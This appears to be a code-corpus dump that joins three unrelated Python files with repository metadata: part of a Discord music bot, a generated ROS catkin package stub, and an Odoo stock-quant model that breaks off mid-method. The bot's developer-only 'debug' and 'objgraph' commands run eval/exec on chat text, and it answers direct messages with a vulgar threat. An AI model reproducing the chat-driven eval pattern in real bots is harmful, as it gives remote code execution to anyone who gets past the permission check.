            rawudata = ['%s #%s: %s' % (m.name, m.discriminator, m.id) for m in server.members]

        elif cur_cat == 'roles':
            data.append("\nRole IDs:")
            rawudata = ['%s: %s' % (r.name, r.id) for r in server.roles]

        elif cur_cat == 'channels':
            data.append("\nText Channel IDs:")
            tchans = [c for c in server.channels if c.type == discord.ChannelType.text]
            rawudata = ['%s: %s' % (c.name, c.id) for c in tchans]

            rawudata.append("\nVoice Channel IDs:")
            vchans = [c for c in server.channels if c.type == discord.ChannelType.voice]
            rawudata.extend('%s: %s' % (c.name, c.id) for c in vchans)

        if rawudata:
            data.extend(rawudata)

    # Send as a file attachment via DM — the list easily exceeds message limits.
    with BytesIO() as sdata:
        sdata.writelines(d.encode('utf8') + b'\n' for d in data)
        sdata.seek(0)

        # TODO: Fix naming (Discord20API-ids.txt)
        await self.send_file(author, sdata, filename='%s-ids-%s.txt' % (server.name.replace(' ', '_'), cat))

    return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
async def cmd_perms(self, author, channel, server, permissions):
    """
    Usage:
        {command_prefix}perms

    Sends the user a DM listing their effective command permissions.
    """
    header = 'Command permissions in %s\n' % server.name

    # Skip the raw user list and any empty permission sets.
    entries = [
        "%s: %s" % (perm_name, perm_value)
        for perm_name, perm_value in permissions.__dict__.items()
        if perm_name not in ['user_list'] and perm_value != set()
    ]

    lines = [header, '```', *entries, '```']

    await self.send_message(author, '\n'.join(lines))
    return Response("\N{OPEN MAILBOX WITH RAISED FLAG}", delete_after=20)
@owner_only
async def cmd_setname(self, leftover_args, name):
    """
    Usage:
        {command_prefix}setname name

    Changes the bot's username.
    Note: This operation is limited by discord to twice per hour.
    """
    # Multi-word names arrive split; stitch them back together.
    name = ' '.join([name] + list(leftover_args))

    try:
        await self.edit_profile(username=name)

    except discord.HTTPException:
        # Discord rate-limits username changes to two per hour.
        raise exceptions.CommandError(
            "Failed to change name. Did you change names too many times? "
            "Remember name changes are limited to twice per hour.")

    except Exception as e:
        raise exceptions.CommandError(e, expire_in=20)

    return Response("\N{OK HAND SIGN}", delete_after=20)
async def cmd_setnick(self, server, channel, leftover_args, nick):
    """
    Usage:
        {command_prefix}setnick nick

    Changes the bot's nickname on this server.
    """
    # Verify we actually hold the change_nickname permission first.
    if not channel.permissions_for(server.me).change_nickname:
        raise exceptions.CommandError("Unable to change nickname: no permission.")

    # Multi-word nicknames arrive split; stitch them back together.
    nick = ' '.join([nick] + list(leftover_args))

    try:
        await self.change_nickname(server.me, nick)
    except Exception as e:
        raise exceptions.CommandError(e, expire_in=20)

    return Response("\N{OK HAND SIGN}", delete_after=20)
@owner_only
async def cmd_setavatar(self, message, url=None):
    """
    Usage:
        {command_prefix}setavatar [url]

    Changes the bot's avatar.
    Attaching a file and leaving the url parameter blank also works.
    """
    # An attached file takes precedence over a url argument.
    if message.attachments:
        avatar_source = message.attachments[0]['url']
    else:
        if not url:
            raise exceptions.CommandError("You must provide a URL or attach a file.", expire_in=20)
        avatar_source = url.strip('<>')

    try:
        # Fetch the image with a 10s cap, then upload it as the new avatar.
        with aiohttp.Timeout(10):
            async with self.aiosession.get(avatar_source) as res:
                await self.edit_profile(avatar=await res.read())

    except Exception as e:
        raise exceptions.CommandError("Unable to change avatar: {}".format(e), expire_in=20)

    return Response("\N{OK HAND SIGN}", delete_after=20)
async def cmd_disconnect(self, server):
    """Disconnect the bot's voice client from this server's voice channel."""
    await self.disconnect_voice_client(server)
    return Response("\N{DASH SYMBOL}", delete_after=20)
async def cmd_restart(self, channel):
    """Wave goodbye, drop all voice connections, and signal the runner to restart the bot."""
    await self.safe_send_message(channel, "\N{WAVING HAND SIGN}")
    await self.disconnect_all_voice_clients()
    raise exceptions.RestartSignal()
async def cmd_spierdalaj(self, channel):
    """Wave goodbye, drop all voice connections, and signal the runner to shut the bot down."""
    await self.safe_send_message(channel, "\N{WAVING HAND SIGN}")
    await self.disconnect_all_voice_clients()
    raise exceptions.TerminateSignal()
@dev_only
async def cmd_breakpoint(self, message):
    """Dev hook: emit a critical log marker (a debugger/log watcher can break on it); no other effect."""
    log.critical("Activating debug breakpoint")
    return
@dev_only
async def cmd_objgraph(self, channel, func='most_common_types()'):
    """Dev command: run an objgraph memory diagnostic and post the result.

    func selects the probe: 'growth', 'leaks', 'leakstats', or any raw
    objgraph expression (evaluated with eval).
    """
    # Imported lazily so objgraph is only required when the command is used.
    import objgraph

    await self.send_typing(channel)

    if func == 'growth':
        f = StringIO()
        objgraph.show_growth(limit=10, file=f)
        f.seek(0)
        data = f.read()
        f.close()

    elif func == 'leaks':
        f = StringIO()
        objgraph.show_most_common_types(objects=objgraph.get_leaking_objects(), file=f)
        f.seek(0)
        data = f.read()
        f.close()

    elif func == 'leakstats':
        data = objgraph.typestats(objects=objgraph.get_leaking_objects())

    else:
        # SECURITY: eval of user-supplied text — only acceptable because
        # @dev_only restricts this command to trusted developers.
        data = eval('objgraph.' + func)

    return Response(data, codeblock='py')
@dev_only
async def cmd_debug(self, message, _player, *, data):
    """Dev command: evaluate (or, failing that, exec) arbitrary Python and post the result.

    SECURITY: eval/exec of chat input — only acceptable because @dev_only
    restricts this command to trusted developers.
    """
    codeblock = "```py\n{}\n```"
    result = None

    # Strip a surrounding ```...``` code fence if the input was pasted as one.
    if data.startswith('```') and data.endswith('```'):
        data = '\n'.join(data.rstrip('`\n').split('\n')[1:])

    code = data.strip('` \n')

    try:
        result = eval(code)
    # Deliberately broad: if eval fails for ANY reason (including SyntaxError
    # on statements), fall through and try exec instead.
    except:
        try:
            exec(code)
        except Exception as e:
            traceback.print_exc(chain=False)
            return Response("{}: {}".format(type(e).__name__, e))

    if asyncio.iscoroutine(result):
        result = await result

    return Response(codeblock.format(result))
async def on_message(self, message):
        """
        Central command dispatcher.

        Parses the configured command prefix, resolves a matching `cmd_*`
        handler, builds its keyword arguments from the handler's signature
        (dependency-injection style), enforces per-user permissions, and
        finally sends the handler's Response back to the channel.
        """
        await self.wait_until_ready()

        message_content = message.content.strip()
        # Fast exits: not a command, our own message, or a channel we are not bound to.
        if not message_content.startswith(self.config.command_prefix):
            return

        if message.author == self.user:
            log.warning("Ignoring command from myself ({})".format(message.content))
            return

        if self.config.bound_channels and message.channel.id not in self.config.bound_channels and not message.channel.is_private:
            return  # if I want to log this I just move it under the prefix check

        command, *args = message_content.split(' ')  # Uh, doesn't this break prefixes with spaces in them (it doesn't, config parser already breaks them)
        command = command[len(self.config.command_prefix):].lower().strip()

        handler = getattr(self, 'cmd_' + command, None)
        if not handler:
            return

        # In DMs only the owner may talk to the bot, and only via 'wejdz'.
        if message.channel.is_private:
            if not (message.author.id == self.config.owner_id and command == 'wejdz'):
                await self.send_message(message.channel, 'NIE PISZ NA PRIV BO CI WYKURWIE.')
                return

        # Blacklist check -- the owner always bypasses it.
        if message.author.id in self.blacklist and message.author.id != self.config.owner_id:
            log.warning("User blacklisted: {0.id}/{0!s} ({1})".format(message.author, command))
            return
        else:
            log.info("{0.id}/{0!s}: {1}".format(message.author, message_content.replace('\n', '\n... ')))

        user_permissions = self.permissions.for_user(message.author)

        # Inspect the handler's signature to decide which arguments to inject.
        argspec = inspect.signature(handler)
        params = argspec.parameters.copy()

        sentmsg = response = None

        # noinspection PyBroadException
        try:
            if user_permissions.ignore_non_voice and command in user_permissions.ignore_non_voice:
                await self._check_ignore_non_voice(message)

            # Inject well-known parameters by name; each pop() removes the
            # parameter so only genuinely user-supplied ones remain below.
            handler_kwargs = {}
            if params.pop('message', None):
                handler_kwargs['message'] = message

            if params.pop('channel', None):
                handler_kwargs['channel'] = message.channel

            if params.pop('author', None):
                handler_kwargs['author'] = message.author

            if params.pop('server', None):
                handler_kwargs['server'] = message.server

            # 'player' creates a player on demand; '_player' may be None.
            if params.pop('player', None):
                handler_kwargs['player'] = await self.get_player(message.channel)

            if params.pop('_player', None):
                handler_kwargs['_player'] = self.get_player_in(message.server)

            if params.pop('permissions', None):
                handler_kwargs['permissions'] = user_permissions

            if params.pop('user_mentions', None):
                handler_kwargs['user_mentions'] = list(map(message.server.get_member, message.raw_mentions))

            if params.pop('channel_mentions', None):
                handler_kwargs['channel_mentions'] = list(map(message.server.get_channel, message.raw_channel_mentions))

            if params.pop('voice_channel', None):
                handler_kwargs['voice_channel'] = message.server.me.voice_channel

            if params.pop('leftover_args', None):
                handler_kwargs['leftover_args'] = args

            args_expected = []
            for key, param in list(params.items()):

                # parse (*args) as a list of args
                if param.kind == param.VAR_POSITIONAL:
                    handler_kwargs[key] = args
                    params.pop(key)
                    continue

                # parse (*, args) as args rejoined as a string
                # multiple of these arguments will have the same value
                if param.kind == param.KEYWORD_ONLY and param.default == param.empty:
                    handler_kwargs[key] = ' '.join(args)
                    params.pop(key)
                    continue

                doc_key = '[{}={}]'.format(key, param.default) if param.default is not param.empty else key
                args_expected.append(doc_key)

                # Ignore keyword args with default values when the command had no arguments
                if not args and param.default is not param.empty:
                    params.pop(key)
                    continue

                # Assign given values to positional arguments
                if args:
                    arg_value = args.pop(0)
                    handler_kwargs[key] = arg_value
                    params.pop(key)

            # Whitelist/blacklist gating -- the owner bypasses both lists.
            if message.author.id != self.config.owner_id:
                if user_permissions.command_whitelist and command not in user_permissions.command_whitelist:
                    raise exceptions.PermissionsError(
                        "This command is not enabled for your group ({}).".format(user_permissions.name),
                        expire_in=20)

                elif user_permissions.command_blacklist and command in user_permissions.command_blacklist:
                    raise exceptions.PermissionsError(
                        "This command is disabled for your group ({}).".format(user_permissions.name),
                        expire_in=20)

            # Invalid usage, return docstring
            if params:
                docs = getattr(handler, '__doc__', None)
                if not docs:
                    docs = 'Usage: {}{} {}'.format(
                        self.config.command_prefix,
                        command,
                        ' '.join(args_expected)
                    )

                docs = dedent(docs)
                await self.safe_send_message(
                    message.channel,
                    '```\n{}\n```'.format(docs.format(command_prefix=self.config.command_prefix)),
                    expire_in=60
                )
                return

            response = await handler(**handler_kwargs)
            if response and isinstance(response, Response):
                content = response.content
                if response.reply:
                    content = '{}, {}'.format(message.author.mention, content)

                sentmsg = await self.safe_send_message(
                    message.channel, content,
                    expire_in=response.delete_after if self.config.delete_messages else 0,
                    also_delete=message if self.config.delete_invoking else None
                )

        except (exceptions.CommandError, exceptions.HelpfulError, exceptions.ExtractionError) as e:
            log.error("Error in {0}: {1.__class__.__name__}: {1.message}".format(command, e), exc_info=True)

            expirein = e.expire_in if self.config.delete_messages else None
            alsodelete = message if self.config.delete_invoking else None

            await self.safe_send_message(
                message.channel,
                '```\n{}\n```'.format(e.message),
                expire_in=expirein,
                also_delete=alsodelete
            )

        except exceptions.Signal:
            # Restart/Terminate signals must propagate to the runner loop.
            raise

        except Exception:
            log.error("Exception in on_message", exc_info=True)
            if self.config.debug_mode:
                await self.safe_send_message(message.channel, '```\n{}\n```'.format(traceback.format_exc()))

        finally:
            # If the command produced no reply, optionally clean up the invocation.
            if not sentmsg and not response and self.config.delete_invoking:
                await asyncio.sleep(5)
                await self.safe_delete_message(message, quiet=True)
async def on_voice_state_update(self, before, after):
        """
        Track joins/leaves in the bot's voice channel and auto-pause/resume
        playback: pause when the channel empties (or someone joins an empty
        one), resume when listeners return. No-op before the bot is ready.
        """
        if not self.init_ok:
            return  # Ignore stuff before ready

        state = VoiceStateUpdate(before, after)

        if state.broken:
            log.voicedebug("Broken voice state update")
            return

        if state.resuming:
            log.debug("Resumed voice connection to {0.server.name}/{0.name}".format(state.voice_channel))

        if not state.changes:
            log.voicedebug("Empty voice state update, likely a session id change")
            return  # Session id change, pointless event

        ################################

        log.voicedebug("Voice state update for {mem.id}/{mem!s} on {ser.name}/{vch.name} -> {dif}".format(
            mem = state.member,
            ser = state.server,
            vch = state.voice_channel,
            dif = state.changes
        ))

        if not state.is_about_my_voice_channel:
            return  # Irrelevant channel

        if state.joining or state.leaving:
            log.info("{0.id}/{0!s} has {1} {2}/{3}".format(
                state.member,
                'joined' if state.joining else 'left',
                state.server,
                state.my_voice_channel
            ))

        if not self.config.auto_pause:
            return

        autopause_msg = "{state} in {channel.server.name}/{channel.name} {reason}"

        auto_paused = self.server_specific_data[after.server]['auto_paused']
        player = await self.get_player(state.my_voice_channel)

        # Someone joined a channel that is otherwise empty (just the bot):
        # pause until a real listener shows up.
        if state.joining and state.empty() and player.is_playing:
            log.info(autopause_msg.format(
                state = "Pausing",
                channel = state.my_voice_channel,
                reason = "(joining empty channel)"
            ).strip())

            self.server_specific_data[after.server]['auto_paused'] = True
            player.pause()
            return

        # Updates about other members: resume when the channel has listeners
        # again, pause when it has emptied out.
        if not state.is_about_me:
            if not state.empty(old_channel=state.leaving):
                if auto_paused and player.is_paused:
                    log.info(autopause_msg.format(
                        state = "Unpausing",
                        channel = state.my_voice_channel,
                        reason = ""
                    ).strip())

                    self.server_specific_data[after.server]['auto_paused'] = False
                    player.resume()
            else:
                if not auto_paused and player.is_playing:
                    log.info(autopause_msg.format(
                        state = "Pausing",
                        channel = state.my_voice_channel,
                        reason = "(empty channel)"
                    ).strip())

                    self.server_specific_data[after.server]['auto_paused'] = True
                    player.pause()
async def on_server_update(self, before:discord.Server, after:discord.Server):
    """Rebuild the voice connection when a server migrates to another region."""
    if before.region == after.region:
        return
    log.warning("Server \"%s\" changed regions: %s -> %s" % (after.name, before.region, after.region))
    await self.reconnect_voice_client(after)
async def on_server_join(self, server:discord.Server):
    """Log new servers, post a mute notice on known guilds, create the data dir."""
    log.info("Bot has been joined server: {}".format(server.name))

    if not self.user.bot:
        notice = "<@{uid}> Hi I'm a musicbot please mute me."
        if server.id == "81384788765712384" and not server.unavailable:  # Discord API
            target = server.get_channel("94831883505905664") or discord.utils.get(server.channels, name='playground') or server
            await self.safe_send_message(target, notice.format(uid="98295630480314368"))  # fake abal
        elif server.id == "129489631539494912" and not server.unavailable:  # Rhino Bot Help
            target = server.get_channel("134771894292316160") or discord.utils.get(server.channels, name='bot-testing') or server
            await self.safe_send_message(target, notice.format(uid="98295630480314368"))  # also fake abal

    log.debug("Creating data folder for server %s", server.id)
    pathlib.Path('data/%s/' % server.id).mkdir(exist_ok=True)
async def on_server_remove(self, server: discord.Server):
    """Log the removal, dump the remaining server list, kill the server's player."""
    log.info("Bot has been removed from server: {}".format(server.name))
    log.debug('Updated server list:')
    # Plain loop: the original list comprehension was used purely for its
    # side effect (logging), building and discarding a throwaway list.
    for s in self.servers:
        log.debug(' - ' + s.name)

    if server.id in self.players:
        self.players.pop(server.id).kill()
async def on_server_available(self, server: discord.Server):
    """Resume a player that was auto-paused while its server was unavailable."""
    if not self.init_ok:
        return  # ignore events fired before on_ready completes

    log.debug("Server \"{}\" has become available.".format(server.name))

    player = self.get_player_in(server)
    if not (player and player.is_paused):
        return

    if self.server_specific_data[server]['availability_paused']:
        log.debug("Resuming player in \"{}\" due to availability.".format(server.name))
        self.server_specific_data[server]['availability_paused'] = False
        player.resume()
async def on_server_unavailable(self, server: discord.Server):
    """Auto-pause playback when the server drops off, remembering why."""
    log.debug("Server \"{}\" has become unavailable.".format(server.name))

    player = self.get_player_in(server)
    if not player or not player.is_playing:
        return

    log.debug("Pausing player in \"{}\" due to unavailability.".format(server.name))
    self.server_specific_data[server]['availability_paused'] = True
    player.pause()
|
[
"noreply@github.com"
] |
EZIO1337.noreply@github.com
|
950cf5404ea2b75c9cadf94aa12dfbb274256e43
|
70ad3badf3fa6e2edf1889d8640f25a7ec0d9db1
|
/ros_catkin_ws/devel_isolated/rosparam/lib/python2.7/dist-packages/rosparam/__init__.py
|
979cdadf5761c2736f68558fa36dbd74e4175656
|
[] |
no_license
|
MathieuHwei/OldGaitMaven
|
758a937dfda2cf4f1aee266dbbf682ef34989199
|
873f7d9089c5d1c0772bd3447e2b0a31dac68b70
|
refs/heads/main
| 2023-06-17T18:40:06.230823
| 2021-07-19T23:08:20
| 2021-07-19T23:08:20
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,030
|
py
|
# -*- coding: utf-8 -*-
# generated from catkin/cmake/template/__init__.py.in
# keep symbol table as clean as possible by deleting all unnecessary symbols
from os import path as os_path
from sys import path as sys_path
from pkgutil import extend_path

__extended_path = "/home/pi/ros_catkin_ws/src/ros_comm/rosparam/src".split(";")
# Prepend every source-space path to sys.path (reversed so the first entry
# ends up first), letting the source tree shadow this devel-space stub.
for p in reversed(__extended_path):
    sys_path.insert(0, p)
    del p
del sys_path
# Extend __path__ so this behaves as a package spanning the source paths too.
__path__ = extend_path(__path__, __name__)
del extend_path
# Locate the real package implementation in the source space: either a
# single-module `<name>.py` or a `<name>/__init__.py` package layout.
__execfiles = []
for p in __extended_path:
    src_init_file = os_path.join(p, __name__ + '.py')
    if os_path.isfile(src_init_file):
        __execfiles.append(src_init_file)
    else:
        src_init_file = os_path.join(p, __name__, '__init__.py')
        if os_path.isfile(src_init_file):
            __execfiles.append(src_init_file)
    del src_init_file
del p
del os_path
del __extended_path
# Execute the found files in this module's namespace so the stub exposes the
# same symbols as the real source-space package.
for __execfile in __execfiles:
    with open(__execfile, 'r') as __fh:
        exec(__fh.read())
    del __fh
del __execfile
del __execfiles
|
[
"giahuy050201@gmail.com"
] |
giahuy050201@gmail.com
|
b80ac7ea9d7671918a54c63f69fe2187f54ccda5
|
061cc9968cac30ca8c5aff4537c4332ae6ca2600
|
/MyCmdb/Users/models.py
|
46cebfa4541ab8c771c5ca2c7655830c658532c7
|
[] |
no_license
|
zhubingbi/-Company-script
|
14ebf83904e54e829ad1ad233d3faa1a8df3acd5
|
b5306e5f7214a1a887d65020f48afc88067645ff
|
refs/heads/master
| 2020-12-02T06:38:08.071754
| 2017-11-15T02:46:11
| 2017-11-15T02:46:11
| 96,868,079
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 777
|
py
|
# coding=utf-8
from django.db import models
# Create your models here.
class Users(models.Model):
    """CMDB user account (credentials, contact info, group and avatar)."""
    # login name
    user = models.CharField(max_length=32, verbose_name='用户名')
    # NOTE(review): stored as a plain CharField -- presumably hashed upstream;
    # confirm before relying on it.
    password = models.CharField(max_length=32, verbose_name='用户密码')
    # registration phone number
    phone = models.CharField(max_length=32, verbose_name='注册电话')
    # birthday kept as free text rather than a DateField
    birthday = models.CharField(max_length=32, verbose_name='用户生日')
    # optional e-mail address
    email = models.EmailField(blank=True, null=True, verbose_name='邮箱')
    # business group the user belongs to
    groups = models.CharField(max_length=32, null=True, verbose_name='用户业务分组')
    # avatar image, uploaded under MEDIA_ROOT/uploadImg
    photo = models.ImageField(upload_to='uploadImg', blank=True, null=True, verbose_name='用户头像')
    # admin flag stored as a string rather than a BooleanField
    isadmin = models.CharField(max_length=32, blank=True, null=True, verbose_name='是否具有管理员权限')
|
[
"zhubingbi@gmail.com"
] |
zhubingbi@gmail.com
|
72522674426e18924bfd748a8caddecc1218f247
|
3282960df3031dfdf48dc7f3ac0433faff84b4f6
|
/Lista02/Ex005.py
|
0b0299ad9dd8756ccbcffe5b2f9f7991d2af5adb
|
[] |
no_license
|
fillipe-felix/ExerciciosPython
|
603120ea05dfcd627ae970f090df5f8072228706
|
119badd286c525397b56d514f8430c93a5eb2c4d
|
refs/heads/master
| 2020-03-23T02:48:26.656961
| 2018-07-15T18:19:08
| 2018-07-15T18:19:08
| 140,993,223
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 646
|
py
|
"""
Faça um programa para a leitura de duas notas parciais de um aluno.
O programa deve calcular a média alcançada por aluno e apresentar:
A mensagem "Aprovado", se a média alcançada for maior ou igual a sete;
A mensagem "Reprovado", se a média for menor do que sete;
A mensagem "Aprovado com Distinção", se a média for igual a dez.
"""
nota1 = float(input("Digite a primeira nota: "))
nota2 = float(input("Digite a segunda nota: "))
media = (nota1 + nota2) / 2
if(media == 10):
print("o aluno foi APROVADO COM DISTINÇÂO")
elif(media >= 7):
print("O aluno foi APROVADO")
elif(media < 7):
print("O aluno foi REPROVADO")
|
[
"felipesoares_1993@hotmail.com"
] |
felipesoares_1993@hotmail.com
|
19ed9b12b8f92747a7d5730dd8e9cfa7b98d1e12
|
6ed0b6576857efc67901790dbf926c558d440bd7
|
/backend/manage.py
|
a6ec92e1ac1e5abe024afe74dc330d67aa5ff4bc
|
[] |
no_license
|
crowdbotics-apps/test-aline-0721-dev-7964
|
dae692cc48e757e0275c853ae975d90de97a1657
|
3104874e1b83a8863942ee6a10c2a8aceb6e52f5
|
refs/heads/master
| 2022-11-19T23:22:20.735744
| 2020-07-22T15:50:19
| 2020-07-22T15:50:19
| 281,442,246
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 644
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
    """Django administrative entry point: configure settings, then dispatch."""
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "test_aline_0721_dev_7964.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError as exc:
        message = (
            "Couldn't import Django. Are you sure it's installed and "
            "available on your PYTHONPATH environment variable? Did you "
            "forget to activate a virtual environment?"
        )
        raise ImportError(message) from exc
    execute_from_command_line(sys.argv)


if __name__ == "__main__":
    main()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
b5208a1ac2fd56dab09c83af59823316ebe6b71a
|
3bd40415aabba9ba705e8e20387d3521a48004eb
|
/Interview Preparation Kit/Dictionaries and Hashmaps/Hash Tables: Ransom Note.py
|
ab86513fa9454ca63732fa9788b15f6984fdcd4d
|
[] |
no_license
|
Narendran36/HackerRank
|
7da6f4ffc8a21031d3776c82e8969ca79eca0b06
|
f58ce1cfaa383ed8aec8ec10467048f6f8465624
|
refs/heads/master
| 2022-12-04T04:25:19.062493
| 2020-08-19T19:13:24
| 2020-08-19T19:13:24
| 256,822,744
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 432
|
py
|
#!/bin/python3
from collections import Counter
# Complete the checkMagazine function below.
def checkMagazine(magazine, note):
    """Print "Yes" if every word of note (with multiplicity) occurs in magazine, else "No"."""
    # Counter subtraction keeps only positive counts: anything left over is a
    # word the magazine cannot supply.
    missing = Counter(note) - Counter(magazine)
    print("Yes" if not missing else "No")


if __name__ == '__main__':
    header = input().split()
    m = int(header[0])
    n = int(header[1])
    magazine = input().rstrip().split()
    note = input().rstrip().split()
    checkMagazine(magazine, note)
|
[
"noreply@github.com"
] |
Narendran36.noreply@github.com
|
0a6cac0a18fbccdf78c9aa59c0e8286c8bfe542c
|
4bf45827230011d8417ff797fe97b946921abaa3
|
/starfish/core/intensity_table/test/test_synthetic_intensities.py
|
6f35cb355c0e13c9e0b699f06bd4270a550c3905
|
[
"MIT"
] |
permissive
|
kne42/starfish
|
713eb9666c29d89b6d0b25ee36b63761c15de336
|
78b348c9756f367221dcca725cfa5107e5520b33
|
refs/heads/master
| 2020-04-19T19:41:37.736938
| 2019-07-18T00:14:16
| 2019-07-18T00:14:16
| 168,395,751
| 0
| 0
|
MIT
| 2019-09-24T02:38:16
| 2019-01-30T18:45:42
|
Python
|
UTF-8
|
Python
| false
| false
| 1,665
|
py
|
"""
Tests for IntensityTable.synthetic_intensities method.
"""
import numpy as np
from starfish.core.codebook.test.factories import codebook_array_factory
from starfish.core.types import Axes, Features
from ..intensity_table import IntensityTable
def test_synthetic_intensity_generation():
    """
    Build a 2-spot synthetic IntensityTable over a (z=3, y=4, x=5) volume from
    a codebook with 3 channels and 2 rounds, then verify its dimensions and
    that, under a fixed random seed, the generated codes match a codebook
    target (GENE_B).
    """
    # fixed seed -> deterministic spots; this seed yields 2 instances of GENE_B
    np.random.seed(2)
    codebook = codebook_array_factory()

    size_z, size_y, size_x = 3, 4, 5
    intensities = IntensityTable.synthetic_intensities(
        codebook,
        num_z=size_z,
        height=size_y,
        width=size_x,
        n_spots=2,
    )

    # dimensions mirror the codebook and the requested spot count
    assert intensities.sizes[Axes.ROUND] == 2
    assert intensities.sizes[Axes.CH] == 3
    assert intensities.sizes[Features.AXIS] == 2

    # spot coordinates stay within the requested volume
    assert np.all(intensities[Axes.ZPLANE.value] <= size_z)
    assert np.all(intensities[Axes.Y.value] <= size_y)
    assert np.all(intensities[Axes.X.value] <= size_x)

    # both generated codes decode to GENE_B
    assert np.array_equal(
        np.where(intensities.values),
        [[0, 0, 1, 1],   # two each in feature 0 & 1
         [1, 2, 1, 2],   # one each in channel 1 & 2
         [1, 0, 1, 0]],  # channel 1 matches round 1, channel 2 matches round zero
    )
|
[
"noreply@github.com"
] |
kne42.noreply@github.com
|
7126110b6be5e67ec95d040579d17ce5b4278f11
|
0b51bc6c7a98d07880955a31e147c0c15b1e3151
|
/tonkho/models/stock_quant.py
|
da383abe5fd406bbfc64072e6fd0731db111501c
|
[] |
no_license
|
tu95ctv/duan_mi2
|
72e8bcbad73dfea1b57b69dbfd1c8d48ecebb975
|
f1728d99e27fcc18684d50f5719f3dcedcffd755
|
refs/heads/master
| 2020-04-28T21:30:25.017845
| 2019-07-07T13:25:43
| 2019-07-07T13:25:43
| 175,584,277
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,283
|
py
|
# -*- coding: utf-8 -*-
from odoo import models, fields, api
from odoo.exceptions import UserError, ValidationError
from odoo.tools.translate import _
from odoo.tools.float_utils import float_compare
from odoo.addons.tutool.mytools import name_compute
from odoo.addons.tonkho.tonkho_tool import write_to_current_path
from odoo.addons.tutool.mytools import pn_replace
from lxml import etree
class Quant(models.Model):
    """ Quants are the smallest unit of stock physical instances.

    Extensions over the stock module: denormalised product/lot data for
    searching, negative-quantity guards, a richer display name, and a
    department filter injected into the search view.
    """
    _inherit = "stock.quant"

    # Denormalised related fields (store=True makes them searchable/groupable).
    pn = fields.Char(related='product_id.pn', store=True,string="Part number")
    categ_id = fields.Many2one('product.category', related='product_id.categ_id',store=True,string=u'Nhóm')
    thiet_bi_id = fields.Many2one('tonkho.thietbi',related='product_id.thiet_bi_id', string = u'Thiết bị',store=True)
    brand_id = fields.Many2one('tonkho.brand',related='product_id.brand_id',string=u'Hãng sản xuất',store=True)
    tracking = fields.Selection([
        ('serial', 'By Unique Serial Number'),
        ('none', 'No Tracking')], string=u"Có SN hay không", related='product_id.tracking',store=True)
    stock_location_id_selection = fields.Selection('get_stock_for_selection_field_',store=False)
    tinh_trang = fields.Selection([('tot',u'Tốt'),('hong',u'Hỏng')],default='tot',related='lot_id.tinh_trang',store=True,string=u'Tình trạng')
    ghi_chu = fields.Text(string=u'Ghi chú',related='lot_id.ghi_chu')
    stt = fields.Integer()
    inventory_line_id = fields.Many2one('stock.inventory.line')
    # ml_ids = fields.One2many('stock.move.line','lot_id',compute='ml_ids_',string=u'Các dòng điều chỉnh')
    ml_ids = fields.Many2many('stock.move.line','stock_quant_stock_move_line_rel','quant_id','move_line_id',compute='ml_ids_',
        string=u'Các dòng điều chỉnh')

    # @api.depends('is_done_ml_filter','is_your_department_filter','id_show')
    def ml_ids_(self):
        # Compute the stock.move.line records that touched this quant's lot at
        # its location (as either source or destination), newest first.
        for r in self:
            # active_id = r.id_show
            domain = [('lot_id','=',r.lot_id.id),('product_id','=',r.product_id.id),'|',('location_id','=',r.location_id.id),('location_dest_id','=',r.location_id.id)]# r.id would be a NewId object here, so it cannot be used
            # if r.is_done_ml_filter:
            #     domain.append(('state','=','done'))
            # if r.is_your_department_filter:
            #     your_department_id = self.env.user.department_id.id
            #     # department_domain = ['|',('location_id.department_id','=',your_department_id),('location_dest_id.department_id','=',your_department_id)]
            #     domain.extend(department_domain)
            r.ml_ids = self.env['stock.move.line'].search(domain,order='id desc')
    # is_done_ml_filter = fields.Boolean(default= True,store=False, string=u'Chỉ lọc dòng hoàn thành')
    # is_your_department_filter = fields.Boolean(default= True,store=False,string =u'Chỉ lọc kho đơn vị của bạn')
    # id_show = fields.Integer(compute='id_show_')
    # def id_show_(self):
    #     for r in self:
    #         r.id_show = r.id

    @api.model
    def create(self, values):
        # Allow callers (e.g. inventory adjustments) to inject extra values
        # through the 'update_inventory' context key.
        if 'update_inventory' in self._context:
            values.update(self._context['update_inventory'])
        res = super(Quant, self).create(values)
        return res

    def get_stock_for_selection_field_(self):
        # Selection options: one (name, name) pair per parent stock location
        # (is_kho_cha = "is parent warehouse").
        locs = self.env['stock.location'].search([('is_kho_cha','=',True)])
        rs = list(map(lambda i:(i.name,i.name),locs))
        return rs

    # @api.constrains('lot_id')
    # def check_product_id(self):
    #     not_allow_check_lot_id_in_different_location =self.env['ir.config_parameter'].sudo().get_param('tonkho.not_allow_check_lot_id_in_different_location' )
    #     if not_allow_check_lot_id_in_different_location ==False:
    #         if self.lot_id:
    #             rs = self.env['stock.quant'].search([('lot_id','=',self.lot_id.id),('quantity','>',0)])
    #             if len(rs)>1:
    #                 raise UserError(u'Không được có quants nội bộ chung lot_id và quantity > 0 product:%s-sn: %s'%(self.product_id.name,self.lot_id.name))

    @api.constrains('location_id','quantity')
    def not_allow_negative_qty(self):
        # Forbid a negative on-hand quantity unless the location explicitly
        # allows it (cho_phep_am = "allow negative").
        for r in self:
            if not r.location_id.cho_phep_am:
                if r.quantity < 0:
                    raise UserError ( u' Kho:%s, không cho phép tạo âm- sản phẩm:%s-Serial number:%s'%(r.location_id.name,r.product_id.name,r.lot_id.name))

    # OVERRIDE of the "view stock moves" action: no location filter, so every
    # move of this product/lot/package is shown regardless of warehouse.
    def action_view_stock_moves(self):
        self.ensure_one()
        action = self.env.ref('stock.stock_move_line_action').read()[0]
        action['domain'] = [
            ('product_id', '=', self.product_id.id),
            # '|', ('location_id', '=', self.location_id.id),
            # ('location_dest_id', '=', self.location_id.id),
            ('lot_id', '=', self.lot_id.id),
            ('package_id', '=', self.package_id.id)]
        return action

    def name_get(self):
        # Display name: "<product> [PN:..] | <serial> | <quantity>".
        res = []
